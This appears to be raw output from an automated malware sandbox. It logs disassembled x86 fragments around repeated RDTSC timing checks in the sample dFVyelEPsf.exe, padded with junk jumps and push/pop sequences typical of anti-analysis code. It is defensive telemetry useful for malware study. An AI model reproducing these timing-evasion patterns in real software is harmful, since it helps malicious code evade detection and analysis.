Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: FE515D second address: FE5176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA521013241h 0x00000009 pop esi 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: FE5176 second address: FE5183 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: FE5183 second address: FE5193 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007FA521013236h 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: FE5018 second address: FE501C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: FE7B95 second address: FE7B9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: FE7B9A second address: FE7BB1 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA52075DA58h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007FA52075DA58h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: FE7E78 second address: FE7E82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FA521013236h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: FE807A second address: FE8093 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA52075DA65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: FE8093 second address: FE8098 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: FE9379 second address: FE9386 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jo 00007FA52075DA56h 0x00000009 pop esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: FEB043 second address: FEB051 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA521013236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: FEB051 second address: FEB055 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: FEB055 second address: FEB059 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: FEB059 second address: FEB05F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: FEB05F second address: FEB069 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FA521013236h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: FEB069 second address: FEB06D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: FEB06D second address: FEB0A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jc 00007FA521013236h 0x00000010 jmp 00007FA52101323Eh 0x00000015 popad 0x00000016 pushad 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 jmp 00007FA52101323Ah 0x0000001e jns 00007FA521013236h 0x00000024 popad 0x00000025 push eax 0x00000026 push edx 0x00000027 push ecx 0x00000028 pop ecx 0x00000029 push eax 0x0000002a pop eax 0x0000002b rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: FEAB59 second address: FEAB63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FA52075DA56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: FEAB63 second address: FEAB88 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA521013249h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: FEAB88 second address: FEAB8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: FEAB8C second address: FEAB90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: FEAB90 second address: FEABAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA52075DA5Fh 0x0000000d jno 00007FA52075DA56h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: FECD8C second address: FECD9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA52101323Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54E0DD5 second address: 54E0E31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FA52075DA60h 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FA52075DA5Bh 0x0000000f xor eax, 5B2C686Eh 0x00000015 jmp 00007FA52075DA69h 0x0000001a popfd 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e push eax 0x0000001f jmp 00007FA52075DA61h 0x00000024 xchg eax, ebp 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54E0E31 second address: 54E0E37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54E0E37 second address: 54E0E55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA52075DA62h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54E0E55 second address: 54E0E59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54E0E59 second address: 54E0E5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54E0E5F second address: 54E0E65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54E0E65 second address: 54E0E69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54E0E69 second address: 54E0E83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA52101323Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54D0D53 second address: 54D0D68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA52075DA61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54D0D68 second address: 54D0D78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA52101323Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 55108E2 second address: 55108FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA52075DA68h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 55108FE second address: 551099B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA521013241h 0x00000009 jmp 00007FA52101323Bh 0x0000000e popfd 0x0000000f mov di, ax 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 xchg eax, ebp 0x00000016 jmp 00007FA521013242h 0x0000001b push eax 0x0000001c jmp 00007FA52101323Bh 0x00000021 xchg eax, ebp 0x00000022 jmp 00007FA521013246h 0x00000027 mov ebp, esp 0x00000029 jmp 00007FA521013240h 0x0000002e pop ebp 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 movsx ebx, cx 0x00000035 pushfd 0x00000036 jmp 00007FA521013246h 0x0000003b adc ah, 00000048h 0x0000003e jmp 00007FA52101323Bh 0x00000043 popfd 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 551099B second address: 55109B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA52075DA64h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54D0B46 second address: 54D0B96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA52101323Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movzx eax, di 0x0000000e pushfd 0x0000000f jmp 00007FA521013241h 0x00000014 or esi, 7D2B1376h 0x0000001a jmp 00007FA521013241h 0x0000001f popfd 0x00000020 popad 0x00000021 mov ebp, esp 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FA52101323Dh 0x0000002a rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54D0696 second address: 54D069A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54D069A second address: 54D069E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54D069E second address: 54D06A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54D06A4 second address: 54D06D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA521013242h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA521013247h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54D06D4 second address: 54D06DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54D06DA second address: 54D06DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54D06DE second address: 54D06E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54D06E2 second address: 54D0707 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA521013248h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54D0707 second address: 54D0716 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA52075DA5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54D0716 second address: 54D0773 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 331E1FDAh 0x00000008 call 00007FA52101323Bh 0x0000000d pop ecx 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 mov ebx, 17A43E18h 0x00000018 pushfd 0x00000019 jmp 00007FA521013241h 0x0000001e sbb ax, A906h 0x00000023 jmp 00007FA521013241h 0x00000028 popfd 0x00000029 popad 0x0000002a mov ebp, esp 0x0000002c pushad 0x0000002d jmp 00007FA52101323Ch 0x00000032 pushad 0x00000033 mov bx, ax 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54D0773 second address: 54D078B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pop ebp 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FA52075DA5Fh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54D078B second address: 54D0791 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54D0791 second address: 54D0795 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54D0602 second address: 54D0608 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54D0608 second address: 54D063E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, EEh 0x00000005 mov cl, dh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b jmp 00007FA52075DA60h 0x00000010 mov ebp, esp 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FA52075DA67h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54D063E second address: 54D0674 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edi 0x00000005 mov si, dx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushfd 0x00000012 jmp 00007FA521013244h 0x00000017 sbb cl, 00000068h 0x0000001a jmp 00007FA52101323Bh 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54D03EC second address: 54D0412 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA52075DA69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov cx, 3C49h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54D0412 second address: 54D0449 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FA521013240h 0x00000008 pop eax 0x00000009 mov ax, bx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, ebp 0x00000010 jmp 00007FA52101323Dh 0x00000015 mov ebp, esp 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FA52101323Ah 0x0000001f rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 551082A second address: 5510840 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA52075DA5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 5510840 second address: 5510844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 5510844 second address: 551085F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA52075DA67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 551085F second address: 5510877 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA521013244h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54F02E6 second address: 54F02EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54F02EA second address: 54F02F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54F02F0 second address: 54F0313 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 movzx eax, dx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FA52075DA64h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54F0313 second address: 54F039D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 pushfd 0x00000006 jmp 00007FA52101323Dh 0x0000000b or ch, FFFFFFC6h 0x0000000e jmp 00007FA521013241h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov eax, dword ptr [ebp+08h] 0x0000001a pushad 0x0000001b push eax 0x0000001c call 00007FA521013243h 0x00000021 pop ecx 0x00000022 pop edx 0x00000023 jmp 00007FA521013246h 0x00000028 popad 0x00000029 and dword ptr [eax], 00000000h 0x0000002c jmp 00007FA521013240h 0x00000031 and dword ptr [eax+04h], 00000000h 0x00000035 jmp 00007FA521013240h 0x0000003a pop ebp 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54F039D second address: 54F03A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54D056C second address: 54D057B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA52101323Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54E0D29 second address: 54E0D7A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA52075DA5Dh 0x0000000b popad 0x0000000c xchg eax, ebp 0x0000000d jmp 00007FA52075DA5Eh 0x00000012 mov ebp, esp 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FA52075DA5Dh 0x0000001d sub ecx, 67C491C6h 0x00000023 jmp 00007FA52075DA61h 0x00000028 popfd 0x00000029 pushad 0x0000002a popad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54F0054 second address: 54F00AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FA52101323Eh 0x0000000c add ax, 2478h 0x00000011 jmp 00007FA52101323Bh 0x00000016 popfd 0x00000017 popad 0x00000018 xchg eax, ebp 0x00000019 jmp 00007FA521013246h 0x0000001e mov ebp, esp 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FA521013247h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 5510008 second address: 551000C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 551000C second address: 5510012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 5510012 second address: 551004A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, ax 0x00000006 mov cx, 74CDh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e jmp 00007FA52075DA68h 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FA52075DA5Dh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 551004A second address: 551005F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA521013241h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 551005F second address: 5510066 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 5510066 second address: 5510082 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FA521013242h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 5510082 second address: 55100C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 7B84h 0x00000007 push edx 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e pushad 0x0000000f push ebx 0x00000010 mov dx, si 0x00000013 pop eax 0x00000014 pushfd 0x00000015 jmp 00007FA52075DA5Dh 0x0000001a xor al, 00000076h 0x0000001d jmp 00007FA52075DA61h 0x00000022 popfd 0x00000023 popad 0x00000024 xchg eax, ecx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 55100C1 second address: 55100C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 55100C5 second address: 55100CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 55100CB second address: 5510122 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA521013242h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FA52101323Bh 0x0000000f xchg eax, ecx 0x00000010 jmp 00007FA521013246h 0x00000015 mov eax, dword ptr [775165FCh] 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FA521013247h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 5510122 second address: 551013A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA52075DA64h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 551013A second address: 551013E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 551013E second address: 551014E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test eax, eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d mov si, dx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 551014E second address: 55101A8 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 je 00007FA592F96A47h 0x0000000d pushad 0x0000000e call 00007FA52101323Ah 0x00000013 mov edi, ecx 0x00000015 pop esi 0x00000016 pushfd 0x00000017 jmp 00007FA521013247h 0x0000001c or cx, 0CDEh 0x00000021 jmp 00007FA521013249h 0x00000026 popfd 0x00000027 popad 0x00000028 mov ecx, eax 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d mov esi, edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 55101A8 second address: 551020D instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FA52075DA65h 0x00000008 sub esi, 65EDC5C6h 0x0000000e jmp 00007FA52075DA61h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 xor eax, dword ptr [ebp+08h] 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov ax, D96Fh 0x00000021 pushfd 0x00000022 jmp 00007FA52075DA64h 0x00000027 add ecx, 7EB87198h 0x0000002d jmp 00007FA52075DA5Bh 0x00000032 popfd 0x00000033 popad 0x00000034 rdtsc
